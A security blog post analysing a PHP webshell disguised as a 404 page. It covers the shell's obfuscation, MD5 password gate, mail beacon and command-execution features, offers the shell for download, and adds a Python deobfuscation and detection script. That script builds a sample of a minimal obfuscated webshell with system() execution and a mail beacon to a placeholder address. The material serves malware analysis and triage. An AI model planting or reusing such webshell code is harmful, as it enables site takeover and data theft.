Recently, I stumbled across a webshell that was impersonating a 404 page not found error. The original filename was "404.php.gif". I did notify the owner of the site. After acquiring the webshell and then placing it in a VM, you quickly see the 404 message.
Viewing the page source, we notice hidden code that is requesting a password.
The source code is base64-encoded and gzipped. After extracting the original code you see the following heading.
You quickly find a password stored as an MD5 hash. Instead of cracking the hash, I find the check in the code and comment it out so I can get past it. Then the main interface of the webshell loads.
Looking through the code you find a base64-encoded section that sends an email to a Gmail account.
The email contains the host of the webshell and the MD5 hash of the password used to access the shell. This code is executed whenever someone accesses the webshell.
This webshell has full access to the files on the site. This would allow the shell operator to find the config.inc.php file containing database credentials. Then the credentials could be placed into the "Sql" section of the webshell to provide full access to the database.
In addition to the functions mentioned above, the webshell has built-in functions to open up a shell using Perl, open a reverse shell using Perl, run system commands through PHP, search for local file inclusion vulnerabilities, port scan the local host, port scan other hosts on the same or other networks, and more.
Update your sites and verify your code has not changed. Here is a copy of the webshell if you would like to explore it. The password is "malware".
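The traits described above (a PHP file masquerading as a 404 image, a gzinflate(base64_decode()) wrapper, an MD5 password gate, a mail() beacon, and command execution) can be pulled out of a suspect file mechanically for triage. This is an added example script, not code from the post or from the webshell; the PHP sample it unwraps is constructed to mirror the described shell, with placeholder hash and mailbox values.

```python
import base64, re, zlib

# Chain of PHP calls wrapped around one quoted blob, e.g. eval(gzinflate(base64_decode('...')))
CHAIN_RE = re.compile(r"((?:\w+\s*\(\s*)+)['\"]([A-Za-z0-9+/=\s]+)['\"]")
# PHP decoder -> Python equivalent (zlib wbits: -15 raw deflate, 15 zlib, 31 gzip)
DECODERS = {"base64_decode": base64.b64decode,
            "gzinflate": lambda b: zlib.decompress(b, -15),
            "gzuncompress": lambda b: zlib.decompress(b, 15),
            "gzdecode": lambda b: zlib.decompress(b, 31)}
# Behaviours the post describes in the deobfuscated shell, as regexes over PHP source
INDICATORS = {"password_hash_check": r"\bmd5\s*\(",
              "mail_beacon": r"\bmail\s*\(",
              "command_exec": r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("}

def suspicious_name(filename):
    """Flag a .php extension hidden before an image/text extension, like 404.php.gif."""
    return re.search(r"\.php\d?\.(gif|jpe?g|png|txt)$", filename, re.I) is not None

def peel_layers(php_source, max_layers=10):
    """Unwrap nested decode calls; returns (innermost source, decoders applied innermost-first)."""
    applied, src = [], php_source
    for _ in range(max_layers):
        for m in CHAIN_RE.finditer(src):
            steps = [f for f in reversed(re.findall(r"\w+", m.group(1))) if f in DECODERS]
            if steps:
                break                       # first literal wrapped by a known decoder
        else:
            break                           # nothing left to peel
        data = re.sub(r"\s+", "", m.group(2)).encode()
        try:
            for fn in steps:
                data = DECODERS[fn](data)
        except (ValueError, zlib.error):
            break                           # literal was not really encoded
        applied.extend(steps)
        src = data.decode("utf-8", errors="replace")
    return src, applied

def scan_indicators(php_source):
    return sorted(name for name, pat in INDICATORS.items() if re.search(pat, php_source))

# Constructed sample modelled on the post: a fake 404 page hiding a gzinflate(base64_decode()) payload
INNER_PHP = ("<?php if (md5($_POST['p']) !== 'PLACEHOLDER_MD5') exit;\n"
             "mail('PLACEHOLDER@example.com', 'hit', $_SERVER['HTTP_HOST']);\n"
             "if (isset($_POST['c'])) system($_POST['c']); ?>")

def build_sample():
    co = zlib.compressobj(9, zlib.DEFLATED, -15)     # raw deflate, the format gzinflate() expects
    blob = base64.b64encode(co.compress(INNER_PHP.encode()) + co.flush()).decode()
    return "<h1>404 Not Found</h1>\n<?php eval(gzinflate(base64_decode('%s'))); ?>" % blob
```

Running `peel_layers` on the output of `build_sample` peels the two layers and exposes the password check, beacon and command execution that the outer file hides; on the undecoded file `scan_indicators` finds nothing, which is why scanning only the visible source misses this class of shell.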
Twitter: @lokut
This blog is for educational purposes only. The opinions expressed in this blog are my own and do not reflect the views of my employers.